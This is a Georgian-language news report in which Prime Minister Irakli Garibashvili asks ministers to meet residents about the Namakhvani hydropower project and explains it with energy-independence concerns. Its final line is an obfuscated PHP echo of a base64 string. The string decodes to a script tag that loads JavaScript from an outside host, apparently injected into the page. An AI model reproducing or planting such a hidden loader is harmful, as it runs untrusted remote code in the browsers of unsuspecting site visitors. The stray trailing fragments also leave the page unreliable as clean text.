celsiusi
ავერსი შნაიდერი
პრემიერ მინისტრი ირაკლი ღარიბაშვილი ეკონომიკის და გარემოს დაცვის მინისტრებს ნამახვანჰესის პროექტთან დაკავშირებით მოსახლეობასთან ჩასვლას და კომუნიკაციას ავალებს. ამის შესახებ ღარიბაშვილმა რამდენიმე წუთის წინ მთავრობის სხდომის დაწყებამდე განაცხადა.
 
პრემიერის თქმით, პროექტთან დაკავშირებით არსებობს კითხვები, რომელსაც დასაბუთებული და კვალფიციური პასუხები უნდა გაეცეს.
 
„აუცილებელია მოსახლეობაშია არსებულ კითხვებს მინისტრების მხრიდანაც გაეცეს პასუხი, ამიტომ მინდა ვთხოვო ქალბატონ თურნავას და ლევან დავითაშვილს ჩავიდნენ ადგილზე, ხვალ მაგალითად და დაიწყეთ კომუნიკაცია მოსახლეობასთან. პირადად გაესაუბერთ და აუხსენით, რასთან დაკავშირებითაც აქვთ წუხილი. ასევე მინდა ვთხოვო მინისტრებს გამართეთ საკომიტეტო მოსმენები. პარალმენტშიც შეიძლება მოვიწვიოთ ამ საკითხით დაინტერესებული პირები, რათა მათი მონაწილეობით გაიმართოს მოსმენები. ყველა ცხარე კითხვას გაეცეს პასუხი.
 
ენერგოდამოუკიდებლობა არის ერთ-ერთი მთავარი პრიორიტეტი და ამ გამოწვევას უნდა ვუპასუხოთ ადექვატურად. იცით, რომ წლიდან წლამდე იზრდება იმპორტირებული ელექტროენერგია. პროგნოზები, რომელიც არსებობს ენერგეტიკაში არის შემდეგი, რომ ყოველ წელს 100 მეგავატი სიმძალვრის ჰესი უნდა შენდებოდეს, რაც ამ ეტაპზე არ ხდება. აქ უნდა ვიპოვოთ ოქროს შუალედი და სწორედ ამ შუალედის გამოსაძებნად აუცილებელია მოსახლეობასთან კომუნიკაცია, რომ არცერთი კითხვა არ დარჩეს პასუხგაუცემელი“, - აღნიშნა ირაკლი ღარიბაშვილმა.
1263
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");